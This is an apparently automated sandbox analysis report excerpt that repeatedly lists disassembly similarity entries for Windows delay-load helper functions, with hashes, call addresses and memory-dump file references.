                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 09d0f025933ef14c444c293f005902c6707f8ef019cdc5f531aff1a6168261b6
                  • Instruction ID: bbfa7312c719de64738741f952ce60dc4ec9e60b310eceabf406bc58357182f5
                  • Opcode Fuzzy Hash: 09d0f025933ef14c444c293f005902c6707f8ef019cdc5f531aff1a6168261b6
                  • Instruction Fuzzy Hash: 24B0129926C3027C310C71547D82D3B031CD6D3B11330801BF109E01C1D7405D055F31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b1685d059514d7d4849049bba71f744036d0be316918c9774db4379f5399746a
                  • Instruction ID: b5fb837de88f3a846a435875fa860cae20da50115f41986398bb25b2e6b954d1
                  • Opcode Fuzzy Hash: b1685d059514d7d4849049bba71f744036d0be316918c9774db4379f5399746a
                  • Instruction Fuzzy Hash: 6CB012A526C2017C310C71547D42D36031CC6D3B10330C01BF50DE01C1D7405E061E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: b0768d15200cce8246564b7001be907b38505ffcb95e196423364220424267e7
                  • Instruction ID: 3618469a9222c5a952cc81ba36741ed1ffd3036df1d52047ba28c1e5c58a9d58
                  • Opcode Fuzzy Hash: b0768d15200cce8246564b7001be907b38505ffcb95e196423364220424267e7
                  • Instruction Fuzzy Hash: A6B0129526C2017C310C71547E42D36032CC6D3B10330C01BF109E02C1D7506E0F1E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1924feda8c5c625c46b0d3ba8ee88c2702e340447d73a4cfc0ccbb6e65fea665
                  • Instruction ID: b7930c23861b920d8a0c57af041f7229c7aded5aed634974bc940ca0dffec017
                  • Opcode Fuzzy Hash: 1924feda8c5c625c46b0d3ba8ee88c2702e340447d73a4cfc0ccbb6e65fea665
                  • Instruction Fuzzy Hash: B6B0129526C3417C314C71547D42D36032CC6D3B10371C11BF109E02C1D7406D8A1E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 0e7c587f84a5e49b3626be8b3c82ae4a7ce08f8cb443f962779aa9acde05abf2
                  • Instruction ID: 1c7113ea118647f3d187bf56388142c04d608b88f3ff4123181415030e78ec2a
                  • Opcode Fuzzy Hash: 0e7c587f84a5e49b3626be8b3c82ae4a7ce08f8cb443f962779aa9acde05abf2
                  • Instruction Fuzzy Hash: 66B012A526C2027C310C7155BD42D36031CC6D3B10330801BF10DE01C1D7405E061E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 9a84f8dcaed14e5efd4e24597518422a97363f71815f6ab2ce5958e578a07596
                  • Instruction ID: fe278a60f6cc8e1f1438a1fd73eb8a964b21eaa65083e86a8d6465684ff0147b
                  • Opcode Fuzzy Hash: 9a84f8dcaed14e5efd4e24597518422a97363f71815f6ab2ce5958e578a07596
                  • Instruction Fuzzy Hash: 98B012A526C2017C310C71547E42D36031CC6D3B10330801BF10DE01C1D7405F071E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                   • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                   • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: d2e270a8c0cb91a7b1a01e3df55f6272741b88d605407dce7af61adb0c6789f2
                  • Instruction ID: 2eb5edd242144d7374809e40447b936d4fb3101aecec811622515beed9781f9e
                  • Opcode Fuzzy Hash: d2e270a8c0cb91a7b1a01e3df55f6272741b88d605407dce7af61adb0c6789f2
                  • Instruction Fuzzy Hash: 1EB012A526C3017C314C71547D42D36031CC6D3B10331811BF10DE01C1D7405E461E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: aa9b7df056c63e819dea53fc94bc5d2e3c46985d0ff59645dfff5fb77166f093
                  • Instruction ID: f077acf2fd78601e12470f5dc9d2a5f81f1311f50b39f145e2bd16ef970c6fa5
                  • Opcode Fuzzy Hash: aa9b7df056c63e819dea53fc94bc5d2e3c46985d0ff59645dfff5fb77166f093
                  • Instruction Fuzzy Hash: 89B012B526D3017C314C72947D42D36031DC6D3B10331811BF109E01C1D7405D451E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 6f0ee09cf1388ddac758699f6bbf0128d0ff7de63b23d097579e553c3a673477
                  • Instruction ID: 65c12eae26dd686d1603493721a79e6ae8230b9e63cd3b23dd2497718d818796
                  • Opcode Fuzzy Hash: 6f0ee09cf1388ddac758699f6bbf0128d0ff7de63b23d097579e553c3a673477
                  • Instruction Fuzzy Hash: C3B012A526D2017C310C71547D42D36031DC6D3B10330C01BF509E01C1D7405D051E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1c76304bbb7213ae1eac128105a2e7381eff99dd7c0ac8029f948722461dfb6f
                  • Instruction ID: b26ddfa3a11f7a3ef76d405b2e43b680ed48bbdcccc3b97a12d4537491de824b
                  • Opcode Fuzzy Hash: 1c76304bbb7213ae1eac128105a2e7381eff99dd7c0ac8029f948722461dfb6f
                  • Instruction Fuzzy Hash: 6CB012D526C2017C310C71647D83D36035CCAD3B10331C01BF609E01C1D7405D051E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: db7170fec43355b837ac1ecaeb61d0aa609024f2aa2ed008cfb4d7bf2711dc48
                  • Instruction ID: f2ef0f15ed2550c95c13fa1696f82132a6939219bf533aeab537d55defcc52ae
                  • Opcode Fuzzy Hash: db7170fec43355b837ac1ecaeb61d0aa609024f2aa2ed008cfb4d7bf2711dc48
                  • Instruction Fuzzy Hash: DBB012A527D2027C310C71547D42D36035DCAD3B10330801BF109E01C1D7405D051E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018D8A3
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 25cd847d68b7d4272c58cb0470d2acf272d245f7fd4d610c9835d4b2e1c0063b
                  • Instruction ID: 5359632d6b06766c23cf7bfaf42524ab8a1675290accc5f082615396c47d9845
                  • Opcode Fuzzy Hash: 25cd847d68b7d4272c58cb0470d2acf272d245f7fd4d610c9835d4b2e1c0063b
                  • Instruction Fuzzy Hash: ADB012E526C2017C310C71547E83D36039CCAD3B10330801BF109E01C1D7405E061E31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 04bf6e468d774bce241abd535b4b72b741641ceb502c9b94197b12463bdd44c1
                  • Instruction ID: d4902fee0c94281f27914df2c9ad3b24e327f24d489e15a4a158e183f8b3f704
                  • Opcode Fuzzy Hash: 04bf6e468d774bce241abd535b4b72b741641ceb502c9b94197b12463bdd44c1
                  • Instruction Fuzzy Hash: E5B012D526C2016C310C71467D02E3E035CC2D4B10330C51BF109D11C9D7405D0A5E32
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 1b80dbaf32c20a2466cbc96e4caabc9d9aeb3f7124ccdba409b6f4eba5eb3ea2
                  • Instruction ID: 75543eb40fcb77ae7af02e3692f7afcff89fc3a4b67f320e268bd6a7f590d749
                  • Opcode Fuzzy Hash: 1b80dbaf32c20a2466cbc96e4caabc9d9aeb3f7124ccdba409b6f4eba5eb3ea2
                  • Instruction Fuzzy Hash: 97B012E526C201AC320C71467D02D3A035CC2D0B10330C11BF409D11C5D7444E065E32
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DAB2
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 4c12038b5d72c0f37a44e1cce5ea0017a3d4a5c615332c6e7a06cc51b35461cb
                  • Instruction ID: be279daf783841bbe3e615ec205b92a835256fae3315314a3a13bd1b927b75f9
                  • Opcode Fuzzy Hash: 4c12038b5d72c0f37a44e1cce5ea0017a3d4a5c615332c6e7a06cc51b35461cb
                  • Instruction Fuzzy Hash: C7B012D52AC3016D710C71467D42E3A035CD2D1B11330811BF009D11C5D7404D059F32
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 345f7a4fa1148f1ccdae71769ba0d5bfcf82cae60297c8ac9d26e9d34a789462
                  • Instruction ID: a3e19ea2d51e78423cdca248195e26f77475163e1c967fd55a1c88bf7a74a183
                  • Opcode Fuzzy Hash: 345f7a4fa1148f1ccdae71769ba0d5bfcf82cae60297c8ac9d26e9d34a789462
                  • Instruction Fuzzy Hash: 07B0129D36C2416C310C71143D07E36036CD2D1B10331802BF11BD01C2DB504D095A31
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659892369.00000000001D2000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_170000_rWjaZEKha8.jbxd
                  Similarity
                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                  • String ID:
                  • API String ID: 1269201914-0
                  • Opcode ID: 47f40e89f05442453e0acce3244dd4fb2ae8ee3ce59a68f67d47d5960490cc58
                  • Instruction ID: a228254301fc34d866418fbe26293e8fc98704c86969a9917448e6bbf3c18e87
                  • Opcode Fuzzy Hash: 47f40e89f05442453e0acce3244dd4fb2ae8ee3ce59a68f67d47d5960490cc58
                  • Instruction Fuzzy Hash: C3B0129937C3467C320C31003D07C37032CC2D1B10331412BF106E00C2DB944D495931
                  APIs
                  • ___delayLoadHelper2@8.DELAYIMP ref: 0018DBD5
                    • Part of subcall function 0018DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018DFD6
                    • Part of subcall function 0018DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018DFE7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659667297.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000000.00000002.1659651714.0000000000170000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659735794.00000000001A3000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001AE000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001B4000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1659751717.00000000001D1000.00000004.00000001.01000000.00000003.sdmp
